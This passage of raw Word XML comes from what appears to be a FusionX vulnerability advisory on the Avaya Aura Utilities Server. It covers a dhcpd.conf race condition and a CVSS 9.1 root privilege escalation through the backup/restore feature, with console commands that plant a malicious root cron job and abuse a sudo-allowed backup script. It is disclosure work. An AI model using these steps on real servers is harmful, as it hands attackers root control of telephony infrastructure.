    <w:p w14:paraId="6ACBE28F" w14:textId="649D8657" w:rsidR="00D80750" w:rsidRDefault="00D80750" w:rsidP="00433FB3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> did not </w:t>
      </w:r>
      <w:r w:rsidR="00FC32CF">
        <w:t xml:space="preserve">fully </w:t>
      </w:r>
      <w:r>
        <w:t>attempt the above attack chain, but did verify each piece of the attack, and did simulate winning the race b</w:t>
      </w:r>
      <w:r w:rsidR="2205248D">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> running a command to search for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/dhcpd.conf.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> files and replace them, while making edits through the admin section. This attack did result in the malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file being placed at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C63E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00955ABE">
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00955ABE">
        <w:t xml:space="preserve"> also verified that these temp files can be overwritten using the “IP Phone Custom File Upload”</w:t>
      </w:r>
      <w:r w:rsidR="00FC32CF">
        <w:t xml:space="preserve"> web application</w:t>
      </w:r>
      <w:r w:rsidR="00955ABE">
        <w:t xml:space="preserve"> feature</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t xml:space="preserve"> and verified the code execution as root d</w:t>
      </w:r>
      <w:r w:rsidR="00FC32CF">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t xml:space="preserve">es occur when a malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00433FB3">
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00433FB3">
        <w:t xml:space="preserve"> file is successfully placed</w:t>
      </w:r>
      <w:r w:rsidR="00F64F0F">
        <w:t xml:space="preserve"> and then a DHCP lease is requested from the server</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00955ABE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC133B" w14:textId="0A37B736" w:rsidR="00955ABE" w:rsidRDefault="001E48A2" w:rsidP="00C63E27">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Ref59009215"/>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00C63E27">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00955ABE">
        <w:t>Root Privilege Escalation via Backup and Restore Feature</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5CF956DF" w14:textId="0ED516BF" w:rsidR="00F82D7F" w:rsidRDefault="00292EBF" w:rsidP="00955ABE">
      <w:r w:rsidRPr="00292EBF">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS 3.1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9.1 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00292EBF">
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00292EBF">
        <w:t>/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3EB98B" w14:textId="5FFEBE14" w:rsidR="00292EBF" w:rsidRPr="00292EBF" w:rsidRDefault="00292EBF" w:rsidP="00955ABE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00292EBF">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53528CFB" w14:textId="278AF921" w:rsidR="00F349E4" w:rsidRDefault="00955ABE" w:rsidP="00955ABE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> discovered that it was possible to achieve root code execution by carefully crafting a backup tar</w:t>
      </w:r>
      <w:r w:rsidR="4DA11982">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file with a malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00433FB3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job, then using the “</w:t>
      </w:r>
      <w:r w:rsidR="004B1F46">
        <w:t>Utility Services Backup and Restore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” feature in the Avaya Aura Utilities Server Administration section </w:t>
      </w:r>
      <w:r w:rsidR="00292EBF">
        <w:t xml:space="preserve">(accessible to the “admin” user) </w:t>
      </w:r>
      <w:r>
        <w:t>to restore the modified backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A77A64" w14:textId="1E95314E" w:rsidR="00292EBF" w:rsidRPr="00292EBF" w:rsidRDefault="00292EBF" w:rsidP="00955ABE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00292EBF">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32726F4D" w14:textId="77A92838" w:rsidR="00955ABE" w:rsidRDefault="00F349E4" w:rsidP="00955ABE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In earlier versions of the server (or at least in </w:t>
      </w:r>
      <w:r w:rsidRPr="00624CC1">
        <w:t>US-7.0.0.0.0.12-e55-01</w:t>
      </w:r>
      <w:r>
        <w:t>), the restore process did not carefully validated an uploaded backup, so it was possible to simply craft a tarfile containing on</w:t>
      </w:r>
      <w:r w:rsidR="00292EBF">
        <w:t>ly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00292EBF">
        <w:t xml:space="preserve">necessary </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">folder structures and malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job, like so:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F349E4" w14:paraId="7C5ECE07" w14:textId="77777777" w:rsidTr="00E04FFF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1FA1671D" w14:textId="77777777" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFD7A63" w14:textId="428A9B10" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="504CD9F1" w14:textId="5A6B8356" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ cat &lt;&lt; EOF &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2F51D24F" w14:textId="62A96381" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>SHELL=/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FDFFC8" w14:textId="2009ED52" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>PATH=/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sbin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:/bin:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sbin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/bin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B4A88C0" w14:textId="7BC14F3A" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>MAILTO=root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556D1992" w14:textId="7E4FD80D" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>HOME=/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="557ADE7D" w14:textId="6E4E3C4B" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>* * * * * root /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/presto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B64331" w14:textId="2C408349" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>EOF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C3C8A37" w14:textId="3EDF629E" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F3225C">
              <w:t>644</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="140A74A8" w14:textId="767443D6" w:rsidR="00F349E4" w:rsidRDefault="00E04FFF" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ tar -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>czvf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B6483E">
              <w:t>util_</w:t>
            </w:r>
            <w:r>
              <w:t>backup.tar.gz</w:t>
            </w:r>
            <w:r w:rsidR="00FC32CF">
              <w:t xml:space="preserve"> --owner=0 --user=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00FC32CF">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202684E8" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ tar -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>czvf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> backup.tar.gz ./util_backup.tar.gz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="167AB42D" w14:textId="6B8EC079" w:rsidR="00B60337" w:rsidRDefault="00B60337" w:rsidP="00E04FFF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t># Now upload backup.tar.gz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="128E29ED" w14:textId="7E099BF5" w:rsidR="00F349E4" w:rsidRDefault="00E04FFF" w:rsidP="00955ABE">
      <w:r>
        <w:br/>
        <w:t>Once the above backup is uploaded it will create “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”. This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job will attempt to run “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/presto” every minute as root. </w:t>
      </w:r>
      <w:r w:rsidR="00E433D2">
        <w:t xml:space="preserve">It is important to ensure that the privileges and ownership of the malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E433D2">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E433D2">
        <w:t xml:space="preserve"> job script are properly set for it to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080BA69A" w14:textId="0FCF0B00" w:rsidR="00E04FFF" w:rsidRDefault="00E04FFF" w:rsidP="00955ABE">
      <w:r>
        <w:t>On later versions of Utilities Server</w:t>
      </w:r>
      <w:r w:rsidR="0014600F">
        <w:t xml:space="preserve"> (at least in </w:t>
      </w:r>
      <w:r w:rsidR="0014600F" w:rsidRPr="0014600F">
        <w:t>US-7.1.0.0.0.18-e55-01</w:t>
      </w:r>
      <w:r w:rsidR="0014600F">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the restore script does more rigorous checking of the backup </w:t>
      </w:r>
      <w:r w:rsidR="00FC32CF">
        <w:t>archive to ensure that the database backup tar files exist and are valid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, therefore it is necessary to first use the “Backup” feature, then </w:t>
      </w:r>
      <w:r w:rsidR="00FC32CF">
        <w:t xml:space="preserve">replace the “util_backup.tar.gz” sub-archive with a version with the malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC32CF">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC32CF">
        <w:t xml:space="preserve"> job</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F65B9C0" w14:textId="31552FAD" w:rsidR="004B1F46" w:rsidRDefault="004B1F46" w:rsidP="00955ABE">
      <w:r>
        <w:t xml:space="preserve">The backup and restore functionality within the web application ultimately make a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call to the BASH script which is located here: “/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avaya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>common_services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/backup”. This script can be called directly by an attacker with “admin” user command line access, such as an attacker that has an SSH session. The entire exploit from this perspective is shown below, however a more common path</w:t>
      </w:r>
      <w:r w:rsidR="00D57027">
        <w:t xml:space="preserve"> via the web application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is show in the chained-exploit proof-of-concept provided in “</w:t>
      </w:r>
      <w:r w:rsidR="00D57027">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D57027">
        <w:instrText xml:space="preserve"> REF _Ref58936618 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00D57027">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>Appendix 2: Full Pre-Auth RCE to Root Proof-of-Concept</w:t>
      </w:r>
      <w:r w:rsidR="00D57027">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D57027">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D57027" w14:paraId="7400BE24" w14:textId="77777777" w:rsidTr="00B6483E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1470ECCF" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B3989BB" w14:textId="6B68EE9A" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /opt/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>common_services</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">/backup -b id_dsa.pub # </w:t>
            </w:r>
            <w:r w:rsidR="00292EBF">
              <w:t>Weird name is s</w:t>
            </w:r>
            <w:r>
              <w:t>imply so we can use the next command to directly own this file for easy cleanup</w:t>
            </w:r>
            <w:r w:rsidR="00B60337">
              <w:t xml:space="preserve"> (allowed in /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B60337">
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B60337">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B60337">
              <w:t>sudoers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B60337">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79659E2D" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 777 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/id_dsa.pub</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A721CFB" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> stage</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16CEB41C" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ tar -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>zxvf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/id_dsa.pub -C stage/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E0515E" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ rm -f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/id_dsa.pub</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="429E49A8" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ cd stage</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D9EA0BA" w14:textId="53C67C98" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00FC32CF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0988E03B" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ rm -f util_backup.tar.gz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630EF70C" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
